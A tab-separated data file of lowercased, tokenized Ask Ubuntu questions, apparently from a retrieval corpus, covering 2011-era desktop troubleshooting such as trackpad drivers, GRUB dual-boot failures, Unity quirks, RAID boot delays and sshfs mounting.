43100	how do i disable the trackpad on my macbook pro using syndaemon ?	i try to run syndaemon -i 2 -t -d to disable the trackpad while typing ( detailed in https : //help.ubuntu.com/community/macbookpro7-1/maverick ) . however , i am getting no synaptics properties on device 'bcm5974 ' . which is weird because i followed all the steps in the guide . my xorg.conf is : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` inputclass '' matchistouchpad `` true '' identifier `` multitouch touchpad '' driver `` multitouch '' matchdevicepath `` /dev/input/event* '' endsection
43103	system always start with `` system program problem detected '' dialog	hello , i 'm getting this error every time when i boot my computer . my ubuntu installation is fresh and i was got a few error on last step while install ubuntu ( because i have problem with my cdrom driver ) . anyway , installation is continued . for example when i tried to open additional driver and language support ( on system settings ) nothing happened , it 's not opening . when i try this in terminal gnome-language-selector i 'm getting this error traceback ( most recent call last ) : file `` /usr/bin/gnome-language-selector '' , line 8 , in < module > from languageselector.gtk.gtklanguageselector import gtklanguageselector file `` /usr/lib/python2.7/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 34 , in < module > from aptdaemon.gtk3widgets import aptprogressdialog file `` /usr/lib/python2.7/dist-packages/aptdaemon/gtk3widgets.py '' , line 61 , in < module > class aptstatusicon ( gtk.image ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/gtk3widgets.py '' , line 66 , in aptstatusicon def __init__ ( self , transaction=none , size=gtk.iconsize.dialog ) : attributeerror : type object 'gtkiconsize ' has no attribute 'dialog' also getting this error for jockey-gtk traceback ( most recent call last ) : file `` /usr/bin/jockey-gtk '' , line 418 , in < module > sys.exit ( u.run ( ) ) file `` /usr/lib/python2.7/dist-packages/jockey/ui.py '' , line 461 , in run self.ui_show_main ( ) file `` /usr/bin/jockey-gtk '' , line 81 , in ui_show_main col_icon.set_sizing ( gtk.treeviewcolumnsizing.autosize ) attributeerror : type object 'gtktreeviewcolumnsizing ' has no attribute 'autosize' i 'm worrying about are there any lack . i do n't know what 's wrong with my installation . are there any way , check my installation ( packages , files etc.. ) .
43104	how do i compile smplayer ?	what do i need to install qt development libraries , so that i can then compile smplayer ? i can reasonably handle the c/c++ side of things , but i somehow always get lost whenever i try to set up a compiler/libraries , etc ... these instructions are from smplayer 's install.txt generic compilation -- -- -- -- -- -- -- -- -- -- -- -- -- - you need at least qt 4.3 to compile smplayer . it wo n't work with an older version . be sure you have installed the qt 4 development package . its name maybe qt4-devel , libqt4-dev or similar . unfortunately , this does n't say much to me for two reasons . i simply do n't know what `` similar '' means ( eg . how can different packages be `` similar '' ? ) libqt4-dev , as mentioned , is in the lucid repository , but i got a slew of 17 `` unresolved dependencies '' messages when i marked libqt4-dev in synaptic package manager.. ( i thought the package manager automatically included any required dependencies ) ... here is one of the messages : depends : libqt4-script ( =4:4.6.2-0ubuntu5 ) but 4:4.6.2-0ubuntu5.2 is to be installed i 'm thinking to use codeblocks for the ide ( because i 've used it in windows ( `` from whence i came '' , and ai n't going back ! : ) ... aside from the issue of what to install , will i need to explicitly tell codeblocks about qt , or will it install to a known library path ?
43106	grub loader problem	i recently updated my wubi install form 10.10 to 11.04 . this had problems , so i finally took the plunge and gave ubuntu its own partition . it all seemed to go very well ( i even got a purple bootscreen which was very exciting the first time ) . however , whenever i try to enter windows xp , i get a flashing horizontal line for a second . then it disappears , and i return back to grub . is there a way to get grub to load windows xp ? what additional information if any is required ?
43110	broadcom sta wireless driver frezees	upon updating my 10.10 netbook to 11.04 on the first startup it froze . i checked the forums and found that disabling wlan in bios fixes the problem so i did that and it worked , system was ok and it did n't freeze but then i had no wireless . i know that broadcom sta driver is to blame cause i removed it from `` additional drivers '' and enabled back in bios wlan and everything worked fine ( exept no wireless cause no driver is activated ) . enabling broadcom sta in the additional drivers again and restarting wireless was up and it found my network and connected to it but in a matter of seconds netbook froze . can you please help me ...
43113	how to add the `` shutdown applet '' back after installing `ubuntu-desktop`	i just installed ubuntu server then did sudo apt-get install -- no-install-recommends ubuntu-desktop startx but the desktop is missing the icons/applets on the top right : shutdown , etc . i want the shutdown + network only for now . how do i add it back ?
43114	merge split terminal tab back into one terminal	in a terminal window , i can use file > open tab to get two tabs in the same window . then , if i move the terminal up to the top of the os , those two tabs become two separated windows . how can i merge those two windows back to one ( like i had before ) ?
43120	can i make unity autoscale according to monitor size , resolution and dot pitch ?	i have noticed that unity does a pretty good job at moving from resolution to resolution with the folded icons in the dock but i 've just used an application that resizes the dock fr my laptop to 32px . it 's not a huge difference in size but what a difference in room ! obviously i would n't want this on my 24 '' screen , so is there a way ? cheers .
43122	ubuntu-kubuntu start-up messed up : how to clean up ?	i installed ubuntu 11.04 recently . then for the sake of trying , i installed the kubuntu plasma package from the software repos . i did n't like kubuntu , so i removed the same package from the software centre again . some programs remain from the kubuntu session however : like k-torrent which came to replace transmission as a default torrent program . then the splash screen remains that of kubuntu and not ubuntu and finally the session randomly logs out ! ! i 'm quite shocked , i thought that by now ubuntu could handle this kind of switches easily and cleanly . but first things first , how do i clean this mess up ? several kunbuntu packages are still on my computer if i believe synaptic . i did n't dare taking them out without knowing what i do . please help . b .
43123	error connecting to newly configured ftp	i just configured a virtual box following the docs . i am getting ltdb : tdb ( /var/lib/samba/group_mapping.ldb ) : tdb_mmap failed for size 77824 ( can not allocate memory ) when trying to connect to ftp . i think the same configuration worked before . what 's wrong with this ? i tried removing samba but still have the same problem
43133	how can i play mp4 files from a usb live iso ?	how can i play mp4 files from a usb live iso of ubuntu 11.04 ? i can mount my external hard drive , but totem would n't allow me to play my mp4 files . trying to find the ubuntu restricted packages with `` apt-cache search restricted '' gives me nothing back .
43136	windows installer on cd ( executable bit )	i am trying to install a windows program with wine , but it reports that it wo n't run because it 's not executable . how in the world am i supposed to add an executable bit in the static medium of cd ?
43142	what is the file that contains the default application icons list for the unity launcher ?	can anyone tell me the name of the file which contains the default icons list for unity launcher ? i am assuming it will be a .conf file .
43146	ubuntu unity ( 64-bit ) bugs on nvidia dual screen	on my work computer i have upgraded 10.04 to 10.10 and now to 11.04 . upgrades have mostly worked well and the dual screen setup is almost working . there are however a couple of annoying bugs which i tried to report but the bug reporting tool told me to ask about the bugs here . here 's what i have found : auto-hide stops working . it does n't seem to matter which application is maximised/covering the dock , it just stays on top . i have tested changing the autohide settings with no result . scenario : one maximised window on each screen . if i now try to drag the window that does n't have focus by dragging the top of the window nothing happens . i can also not give the window focus by clicking the top bar , i have to click inside the window and then i can drag the window . if i unmaximise the window with focus it does work and i can both change focus and drag the window directly by clicking the top of the maximised window . any bug fixes coming for these issues ? any work-arounds ?
43147	what are the most compatible mini pci express wireless cards	i have got an acer aspire one netbook and i am after a wireless card that actually works well with ubuntu . the original card was flaky and disconnecting intermittently and so i replaced it with an intel wireless wifi 5100agn . again i have had driver problems with this card , i am stuck running wep with me providing the ip address etc.. it will not work with wpa at all . it 's a strange one as the card works fine on other wireless networks and other devices work fine on my wireless network ( buffalo whr-g54s running tomato firmware ) . in both cases the wireless cards are reported to be supported by ubuntu . anyway , can anyone recommend the any wireless cards or chipsets that are most compatible with ubuntu and a range of wireless access points ?
43151	how to destroy a window ?	sometimes there 's a leftover window in the bottom right area of the screen . it 's transparent ( invisible ) , but it will not let me click windows underneath it . i know it 's there , after i verified with xwininfo ( i can get the id of this window ) . so my question is : how can i destroy this window ( so that i wo n't have to restart/logout to get rid of it ) ? more details : there was a command to get the owner process of a window but i ca n't remember it right now . however , i did try it , and could n't retrieve a process . likely , the window is orphaned . so i just need an x specific way to destroy the window as the owner process likely no longer exists .
43155	launch a second copy of an application using unity	i figured out how to launch a second copy of an application using the keyboard , ( super+shift+ # ) but this works only for the first ten launcher items . is it possible using the launcher with a mouse ? garvan
43158	how do i transfer an installation from internal to external usb hdd	i started to use ubuntu 10.04 on a laptop booting from an external usb hdd , it worked pretty well after some tweaking ( had to use a separate 1gb boot partition etc ) . after a while running mostly on my external hdd i decided to wipe the internal hdd ( e.g get rid of the useless crippled and slow corporate winxp installation ) and migrate my ubuntu installation from the external to the internal hdd . that went fine after some tweaks , i copied the entire disk using `` cp -a '' without any major problems . after running for a while now in the internal hdd i need to temporarily move back my system to the external hdd since i am swapping laptops . what i did initially was to simply transfer the internal hdd to the external using rsync on a running system , just to test . i will make the real transfer later on after booting from usb flash so both hdd 's is not in use . i tried to setup the external hdd for boot using grub-install after i chrooted to the external hdd but everytime i bootup the laptop and select external hdd as boot device it always boots from the internal hdd . i know that i can probably copy external hdd back into the internal on the new laptop and fix it later , but i really want to test booting from the external hdd before giving back my laptop in exchange for a new one . tl ; dr : installing ubuntu 10.04 on external hdd and boot , ok ! migrating ubuntu 10.04 from external hdd to internal hdd and boot , ok ! trying to mirror the internal hdd to external hdd and boot from external hdd , failed ! edit it seems that the laptop boots on the internal hdd even though i chose external hdd in the bios boot menu , e.g the bios fails to find a bootable partition on the external hdd and falls back to the internal hdd . i will dig into the mysteries of grub cli at the moment to investigate the status of the mounted partitions , i have ( hd0 ) internal and ( hd1 ) external visible in grub . both has subpartitions 1 , 5 and 6 . ( 1 is /boot partition 1gb , 5 primary root / partition and 6 is swap ) .
43159	banshee under unity stops playing music when hitting the ( x ) icon	when running banshee under unity on natty ( upgraded from maverick ) , music plays as expected but when hitting the ( x ) button on the title bar the window exits and the music stops as well .
43162	sound recorder application pull down menus may have their functionality swapped	( applications > sound & video > sound recorder ) to be able to record from an internet radio i had to use the following sound preferences ( file > open volume control ) sound preferences window hardware tab - profile > analog stereo output input tab - unable to select input , yet it worked fine . to me this does not make sense , unless i am missing something . is this correct ?
43164	graphical shortcut to command	in this answer , this command is recommended : wine /media/cdrom/app.exe how can i make a simple graphical program to let me choose a variable for the file that was chosen in the command ?
43167	virtualbox hardware acceleration on ubuntu server	i have ubuntu server 10.10 64-bit installed on a relatively good motherboard with amd phenom ( tm ) 9650 quad-core processor and integrated nvidia graphics card . virtualbox 4.0.6 has been installed over it from the official oracle repository . windows xp sp3 guest has been prepared on my other ubuntu desktop 10.10 64-bit host with all hardware acceleration , virtualization features as well as guest additions being enabled . the completely configured guest has been transferred to the server , is simply up and running headless , being operated via rdp . and i am almost completely happy about this setup , if only there were no troubles with video acceleration . the fact is that 2d and 3d video acceleration is activated on vm , but practically is not functioning , which leads to significant rendering delays and high cpu usage on guest . i am almost completely sure this is because some corresponding packages need to be installed on the server . those should be some x.org components and/or opengl libraries and/or proprietary nvidia drivers etc . installing full x.org packages stack on server seams not an appropriate solution for me . to find recommndations in the official virtualbox documentation also failed . could you please give me some hints ? hope the solution to be helpful not only for me . thank you .
43171	how do i interfere with domain access ?	i 've just installed self control for ubuntu . it looks like it just tweaks /etc/hosts and defines some rules in iptables . some sites are n't getting blocked , and i think it 's because they 're distributing hosting across a couple of servers . there 's a system administrator way to say that , i 'm sure , but i suspect i need to define wildcard rules . so my first question is : can i write wild card rules for /etc/hosts and iptables ( which ? ) to prevent access to anything at , hypothetically , *.facebook.com ? i do n't need to do this inside of selfcontrol . i 'd also like to fail more elegantly -- now the page just tries to load and does n't . i 'd like to redirect to a local page where i can offer myself little reminders about how this is n't actually where i want to spend my down time . can i do that w/in the framework above ? redirect to a page on localhost ? ( i am running a local web server , as i think anyone on ubuntu is )
43174	installing ubuntu on external hard disk	i have an external hard disk with 500 gb capacity . i have data filling almost 300 gb . i want to install ubuntu into it . i have downloaded the iso and have written it to a usb drive as a bootable device . my laptop runs on windows 7 . what is the way to install ubuntu in my external hdd . i have yet to do any partitioning . i would not like to lose the data .
43176	can banshee play internet radio from .pls files ?	i 've recently become interested in internet radio , and have found a few stations that i would like to add in banshee . examples are the stations shown at http : //www.chronixradio.com/ - but the only one i can add in banshee is the 'metal masters ' one . i tried getting the urls for all of them from 'listen now ' - > one of the radios - > 'mp3 streams ' - > '128k cable/dsl ' , but for some reason the only one that banshee can figure out is the metal masters one . i suspect that it may be because the other stations have 'mirrors ' in the .pls files . is banshee incapable of handling that ? or is the problem something else ? please help - it seems a lot of internet radio stations use .pls files , and i would be surprised to learn that banshee ca n't handle them .
43178	when i boot , i have to log in 3 to 5 times	there is always 2 email logins ( i have 2 cox accounts ) and 2 keyring logins . i am the only user in a family environment , no other people have access . there must be a way to log in only once . any help ? ?
43181	minecraft jar not marked as executable	i looked up several tutorials on how to install and they dont work . i do everything correctly but then i get this : the file '/home/mike/downloads/minecraft.jar' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit . i run the minecraft.jar with the sun java runtime 6 but it doesnt work : / . any help would be greatly appreciated !
43186	can not get temperatures in dell studio 1558	i could never get proper temperatures on my dell studio 1558. lm-sensors and acpi give wrong readings . the output of sensors is , $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +26.8°c ( crit = +100.0°c ) temp2 : +0.0°c ( crit = +100.0°c ) acpi -v gives me , $ acpi -v battery 0 : full , 100 % battery 0 : design capacity 414 mah , last full capacity 369 mah = 89 % adapter 0 : on-line thermal 0 : ok , 0.0 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 100.0 degrees c thermal 0 : trip point 1 switches to mode passive at temperature 95.0 degrees c thermal 0 : trip point 2 switches to mode active at temperature 71.0 degrees c thermal 0 : trip point 3 switches to mode active at temperature 55.0 degrees c thermal 1 : ok , 26.8 degrees c thermal 1 : trip point 0 switches to mode critical at temperature 100.0 degrees c thermal 1 : trip point 1 switches to mode active at temperature 71.0 degrees c thermal 1 : trip point 2 switches to mode active at temperature 55.0 degrees c cooling 0 : lcd 0 of 15 cooling 1 : processor 0 of 10 cooling 2 : processor 0 of 10 cooling 3 : processor 0 of 10 cooling 4 : processor 0 of 10 cooling 5 : fan 0 of 1 cooling 6 : fan 0 of 1 i suspect even hddtemp gives bogus readings as its always at 46 $ sudo hddtemp /dev/sda /dev/sda : st9500420as : 46°c i have gone through some bug reports and some used to have the same problem after resuming from suspend . but i always have this problem . i had updated to the latest bios from windows a couple of weeks ago , will updating from ubuntu change anything ? correction : hddtemp 's readings do change . its now at 45 .
43188	looking for a simple outliner	back in the day i used omnioutliner a lot . is there something like that for gnome ? google suggested me gnome outliner and a friend of mine mentioned treesheets . but is there something else ?
43189	installing apt module without internet	how can i take an apt module from an internet enabled ubuntu and get it to a usb for a non internet install ? i am wanting the following which are available through apt . i am sure there will be more that i end up needing . wine libcurl3
43196	grub2 failed with 'no video mode activated '	i 've installed ubuntu-alternate 11.04 to use the encrypted feature . all works fine , but rebooting the system ended up in an error-message : error : no video mode activated' reading some threads i guess , grub wants to read something , especially fonts , from the encrypted device . is this a known error and does an solution exists .
43206	how to make a partition truly secure ?	when i boot from an usb stick into my laptop i am able to mount and connect through chroot to the my hard drive and browse my files without a problem , while this has been something very very useful in times , i figure it would also be way to easy to access my files and installation for someone else . what alternatives do i have to secure my hard drive ?
43208	should translations of x-gnome-* extension keys be stripped from desktop entry files and put in language packs instead ?	to save disk space , all packages in the main repository have translations of the `` name '' , `` genericname '' and `` comment '' keys stripped from their *.desktop files , and put in language packs instead . however , lots of packages in main ( for example , inkscape ) also contain multiple translations of gnome extension keys such as `` x-gnome-fullname '' . is there any reason why these keys are not stripped from the *.desktop files , or would it make sense to update the package mangler to do this ?
43209	folder browser : copy to restricted locations ?	can i launch the folder browser as root so i can copy files to restricted locations ?
43211	why is ubuntu looking like windows 98 ?	why is my ubuntu `` natty narwhal '' desktop looking like windows 98 ? i think it 's a bug . any ideas ?
43215	kate autoindent is off , but it keeps autoindenting	i 'm running kate under gnome , in maverick . after the last ubuntu update ran , the `` enter '' key started acting strangely in kate . i 'm guessing it 's trying to auto-indent even though i have auto-indent off . settings : but when i 'm in a css file , and i hit the `` enter '' key once , the cursor jumps down 2 lines , and indents 3 spaces . i just use kate as a text editor ( i use it because it has the best syntax highlighting ) and i 'm at a loss . any suggestions/ideas are very welcome .
43220	which methods are used to determine the number of ubuntu users ?	mark shuttleworth lately said that the goal of ubuntu is 200 million in 4 years . how can they determine that ? which method will they use ? ips , downloads ? updates ? which all seems to be inaccurate . how can i tell canonical i 'm an ubuntu user ? ca n't they make a survey during the install process saying , if you are an ubuntu user tick this option once ? or to make an update to all supported versions , with a pop up saying click ok if you are an ubuntu user . and if you have more than one machine running ubuntu please click ok just on one machine ?
43226	where is catalina_base and catalina_home located for tomcat6 ?	i recently installed tomcat6 with apt-get and have got it up and running . ubuntu doesnt set the $ catalina_base and $ catalina_home environment variables during the install . how can i locate these directories , so i can manually set them ?
43227	how do i fix a slow boot on a raid setup ?	i 've just finished setting up a raid 1 on my system . everything seems to be okay , but i have a very slow boot time . it takes about three minutes between the time i select ubuntu from grub and the time i get to the login screen . i found this really neat program called bootchart which graphically displays your boot process . this is my first boot ( after installing bootchart ) . i 'm not an expert at reading these , but it appears there are two things holding up the boot , cdrom_id and md_0_resync . i tried unplugging my cd drive sata cable , and this is the new boot image . it 's faster , but it still takes about a minute , which seems pretty slow on this system . the md0 raid device is my main filesystem . is it true that it needs to get resynced on each boot ? i 'm not sure how to diagnose my cd drive issue . the model is a nec nd-3550a dvd rw drive . i should also note that there 's a quick error message at startup about the cd rom . it 's too quick for me to read it , just one line on a black screen saying `` error : cdrom something something '' . i 'm not sure what other information to include . thanks for any help .
43231	how can i upgrade a netbook with low system memory ?	i have a mini laptop with 100mb remaining ( on a 4gb drive ) . the computer has an sd slot and i have a 2gb sd card available . xubuntu says that only 2gb are required , i could also have it set up with ssh keys to plenty of memory on my desktop and server . currently when i try to upgrade from xubuntu 10.10 to 11.04 , i get the following error : not enough free disk space the upgrade has aborted . the upgrade needs a total of 1,717m free space on disk '/ ' . please free at least an additional 1,610m of disk space on '/ ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . is there a way that i can use my sd card for the extra free space that is required ?
43234	looking for a frontpage alternative ( web design ide )	is there any frontpage alternatives out there i can use ? please list any and all alternatives available with a recommendation per answer .
43239	how do i configure the wacom bamboo tablet drawing area ?	how do i configure the wacom bamboo graphics tablet to avoid drawing an oval instead of a circle ?
43244	how do i recover when compiz crashes ?	often compiz will crash and leave the keyboard useless . normally i drop to the console and restart gdm . is there a solution where i can start compiz back up without losing everything in the current session ? compiz -- replace & that 's how i usually restart compiz when it crashes and i can still use the keyboard . ( if you have a tip on how to prevent compiz from crashing i 've posted here fresh install of 11.04x64 - display ( compiz ) constantly failing ? ? ? - am i right that compiz is failing or is it x ?
43246	how to configure gnome 3 to show icons on desktop	in ubuntu 11.04 , files in /home/user/desktop appear as icons on the desktop . it seems that they do not under gnome 3 using gnome shell ( for example on fedora 15 ) . how do i configure that ? update : they do appear by default in 11.10 , under both unity shell and gnome shell .
43247	dell vostro 3450 bluetooth disables on reboot	i have a dell vostro 3450 with an core i3 cpu and no additional graphics card . the problem is , when i shut down and start later , compiz is always disabled . after i do a reboot ( not shutdown and power on , that does n't help ) bluetooth works . so practically i have to turn on and then reboot to get everything going , also there seems to be a problem with keyboard light . on power on it is always turned to the second level of brightness .
43249	can i migrate imap folders to an accessible backup somewhere ?	i 'm shutting down an old email account , but i 'd like to keep access to the messages in the associated imap folders . there are a lot of folders/ messages . is there a way i can go through the side door and migrate all the folders and messages into my local thunderbird folders ? i want to be able to pull them up in searches , etc . but i 'd like to get rid of the account .
43250	how do i update my graphics drivers ?	i am using a laptop and ubuntu 11.04 . i would like the easiest way possible because i am new to linux . here is my display information : *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:41 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport : e080 ( size=8 ) *-communication unclaimed description : communication controller
43260	how do i define a file context options keyboard shortcut ?	when selecting a file in nautilus , i would like to see the context options of the file ( mouse right click ) using the keyboard and not the mouse . example , when i iterate over the list of files in a folder with the arrows , and one of the files is an archive , i would like to extract the file here without the need to go to the mouse . it is much healthier to work with the keyboard . thanks .
43261	is there any `` always below '' option for the windows , like the `` always on top '' one ?	well , just like the title says : is there any `` always below '' option for the windows , like the `` always on top '' one ? if there is a shortcut that can do that , or a command that can make the window i touch become always below , it would be even better
43263	ubuntu one music store - in my currency ?	i 'm really curious about the ubuntu one music store , but i noticed all the prices are in âź , and my country does n't use euro . can or will the uoms translate the prices into sek for me ?
43264	how to open a pdf file from terminal ?	i used to work on the mac terminal before and i used : open file2open.pdf and the pdf file would be opened on preview or whatever my default viewer was . when i use it in the terminal in ubuntu i get this error message : could n't get a file descriptor referring to the console
43278	how to change the new workspace icon to the older icon ?	the new `` workspace '' icon is very similar the `` terminal '' icon and i prefer the older icon . how can i change it ? p.s . : sorry for my english ; - )
43280	how can i get the skype notification back in the system tray ?	i am running 11.04 . i have skype running but it does not show up in the notification tray . it was working until i added skype to auto-start when i log in . does anyone know how to make it reappear ?
43282	what happens when i install the package `` linux '' ?	i see a package called `` linux '' in synaptic in 10.04 , and i want to know what happens when i install it , without making my system unusable . does it make a dual-boot option ( i have only ubuntu ) , or replace my kernel ?
43286	how to prompt for input while doing preseed/late_command ?	my preseed server install file executes a number of additional tasks with a bash script called with preseed/late_command . i wish to prompt for a password during this process to install ldap properly . how can i do this in debconf style ?
43290	tablet pen does n't work correctly when in portrait mode	i 'm using a lenovo x201 tablet . i recently upgraded to 11.04 . when i rotate the screen 90 degrees ( in either direction ) to use the computer in portrait mode , the tablet pen does not work correctly . more specifically , the action of the tablet pen is reflected in the horizontal center line . does anyone know how to correct this behavior ? thanks !
43293	is there a way to set the brightness of my desktop pc using key shortcuts ?	i do n't really know what relevant information to post here ... i 'm using ubuntu 11.04 with unity enabled using free drivers for the nvidia card fx-5200 256mb ( private drivers do n't work ) . i 'm using an 19 '' lg monitor which has a brightness configuration menu , but changing is kind of annoying , and takes a lot longer that if i had a key command . so , can i set a shortcut to set brightness level from the keyboard like as i were using a laptop ?
43297	sub folders in /home/documents `` disappeared '' from nautilus view	the /home/martin/documents folder has sub folders . within nautilus they can not be seen . when the same folder is viewed from a terminal session , they are listed . they are all owned by the same user and are not hidden ? the folder and it 's sub folders can be copied via cp to another location , viewed and accessed from nautilus . when attempted to copy from second location back to /home/martin/documents sub folders recognised as already there . also to try and create a folder via file-create folder , nautilus recognises the folder exists ! ! ? ? ? ? suggestions please .
43300	low graphics performance with intel hd graphics	hey , my laptop should be capable of running some games fine but does n't . examples are egoboo and tome . http : //www.ebuyer.com/product/237739 this is my laptop . i tried the gears test and i only get 60 fps , on irc they said thats a big issue and should try the forums . i am using ubuntu 11.04 and was told i should have the newest drivers . neil @ neil-k52f : ~ $ /usr/lib/nux/unity_support_test -- print opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile gem 20100330 development opengl version string : 2.1 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes
43304	can i install 10.04 on a sandy bridge box ?	if i have a new computer with sandy bridge processor . does this mean i can only install natty ? can the lucid kernel run on sandy bridge ? what will happen if i try installing 10.04 on a sandy bridge box ?
43305	weather indicator not showing felt air temperature ?	i installed weather indicator for ubuntu 11.04 , but i ca n't find the information about the felt air temperature ( like temperature is 30 degree , feels like 32 degree ) . how could i get that information ? i can get this from old ubuntu .
43306	duplicate application icons appear in dash	i have duplicate application icons appearing in dash with no idea how to resolve .
43307	ubuntu one ca n't sync a 481mb zip file	been trying for days to sync a 481mb zip file . wont sync , get the arrows and exclamation point emblem . smaller zip files sync fine , easily . large files have synced for me in the past . wtf is going on ? unhappy . lucid lynx 64bit .
43310	back in time on natty	since ubuntu 's maverick release i had been using back in time for my backup needs . now i see that it 's not updated for natty in their ppa . when i searched in the synaptic , i saw a new version of 'back in time ' with maintainers as ubuntu developers . so can i expect future support for back in time from ubuntu developers or do i need to wait for ppa to be updated ?
43311	bootchart zombie process udevadm	every time i look at the logs from bootchart , i notice a process called udevadm that is mostly coloured as if it is a zombie process . it is accompanied by modprobe , wait-for-root and udevd . they take up about 25 % of my computer 's boot time and nothing seems to be happening during this time according to the graphs above the process chart . it would be nice if someone gave an explanation of these processes , what they do , why udevadm is a zombie most of the time and why nothing appears to be happening in the time they are running . if this is unnatural behaviour , i would also appreciate help on how to fix this .
43314	how to update packages compiled from source ?	i am about to install the enlightenment desktop environment and it is a very long process . i want to know if once i have it installed will it update automatically or will i have to keep compiling it to update it .
43317	what is the difference between the 'sudo ' and 'admin ' group ?	i noticed that two groups are granted similar-looking permissions in /etc/sudoers : # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all my user account with `` administer the system '' privileges is in the admin group , and there do n't appear to be any users in the sudo group . what are these two groups for ?
43318	how do i share files with a mac ?	i would like to allow a mac user on the same network to edit ( in-place ) a stylesheet file on my localhost . hence i would like to share /var/www/site1 with users on the network . how can i do this ?
43319	is it possible to add middle click option to close tabs ?	i would like to know if it is possible to close tabs in several applications like gedit or empathy by doing click on the middle mouse button ( wheel or scroll button ) like the same behaviour of chrome and firefox . i would like to do it without having to use compiz since i am not running compiz ( using ubuntu classic ( no effects )
43324	how do i down sync from ubuntuone to my computer ?	i did a clean install of ubuntu natty . now i ca n't get ubuntuone to sync my files . the files are in ubuntuone i can read them . previously i installed natty beta 2 and everything worked fine . it seems like it was automatic .
43345	how to remove a repository ?	please let me know how to remove certain repositories in ubuntu 11.04 . i am getting the following errors while updating . sudo apt-get update err http : //ppa.launchpad.net natty/main sources 404 not found err http : //ppa.launchpad.net natty/main i386 packages 404 not found ... ... e : some index files failed to download . they have been ignored , or old ones used instead .
43347	can ipod/ipad be accessed through nautilus ?	if i plug in ipod to my computer , can the nautilus access the storage ? if not , then what would be the best application to access an ipad/ipod ( apart from banshee ) ?
43350	how do i get the ubuntu one client in my native language ?	after installing ubuntu one on 11.04 , i decided to install the windows beta . i ca n't use version 4 because the menus are in english . now i can only access my ubuntu one account using chrome . i 'd like to help , but english is not my native language . thank you
43354	how to connect brother mfc 255 cw wireless printer ?	i just succesfully installed my printer driver . my printer is brother mfc 255 cw . it works fine when i connected thorugh usb cable . then i tried to figure out how to connect using the wireless connection from the printer . somehow ubuntu ca n't detect the printer signal . this is so far the way what i did to try getting the printer connect to my laptop : system setting printer add printer network printer appsocket/hp jet direct , then set the host with the ip address that the printer provided and port number : 9100 selecting the drive / installation after the additional installation finish i tried to print test page and nothing happen . is there any other way to figure out how to make the wireless working ? or maybe i did something wrong on the process ... please guys help me out ... ...
43355	is there a cohuman client ?	simple question : does someone know a client for the gtd webservice cohuman for ubuntu ?
43358	fatal errors with gnome 3 installed from ppa ?	every time i start up my natty + gnome 3 install , which i installed from the gnome3-team ppa , i get a sad computer icon and a note saying that something bad has happened and i need to log out . i can log into unity on the same install , but i would like to get gnome 3 working . is anyone else having this problem ? if not , does anyone know how i can troubleshoot this ? the log file viewer comes up completely blank every time i open it . update : here 's what i get when i try to run gnome-shell from a terminal : jon @ jon-laptop : ~ $ gnome-shell -- replace js error : ! ! ! exception was : error : requiring networkmanager , version none : typelib file for namespace 'networkmanager ' ( any version ) not found js error : ! ! ! linenumber = '0' js error : ! ! ! filename = 'gjs_throw' js error : ! ! ! stack = ' ( `` requiring networkmanager , version none : typelib file for namespace 'networkmanager ' ( any version ) not found '' ) @ gjs_throw:0 @ /usr/share/gnome-shell/js/ui/status/network.js:8 ' js error : ! ! ! message = 'requiring networkmanager , version none : typelib file for namespace 'networkmanager ' ( any version ) not found' js log : nmapplet is not supported . it is possible that your networkmanager version is too old window manager warning : log level 16 : unable to register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject window manager warning : log level 16 : error registering polkit authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject ( polkit-error-quark 0 ) glib-gio-error ** : settings schema 'org.gnome.shell.extensions.user-theme ' is not installed aborting ... aborted jon @ jon-laptop : ~ $ gnome-shell-calendar-server [ 2722 ] : got hup on stdin - exiting
43359	why ca n't i read drives properly ?	i installed natty and my perfectly functioning ubuntu has stopped working - specifically , it has stopped reading disks . i think the problem has to do with disk utility not loading ( though ubuntu can see usb and dvd drives , but not mount them ) , so i tried it through command prompt and got this : sudo palimpsest libgdu : error : gdu-pool.c:2369 : device_recurse : assertion failed : ( depth < 100 ) lee @ lee-desktop : ~ $ i 'm not being lazy - i have now spent three days trying different things to fix it , please help !
43363	how to auto mount using sshfs ?	i am using the following command to mount a ssh ubuntu directory to my ubuntu pc . sshfs user @ 192.xx.xx.xx.xx : /dir/dir /home/username/mount/xxx my question is , can i create a script for this in my desktop where i can make a double click and run this script when ever i need to mount the drive without manually typing the command always .
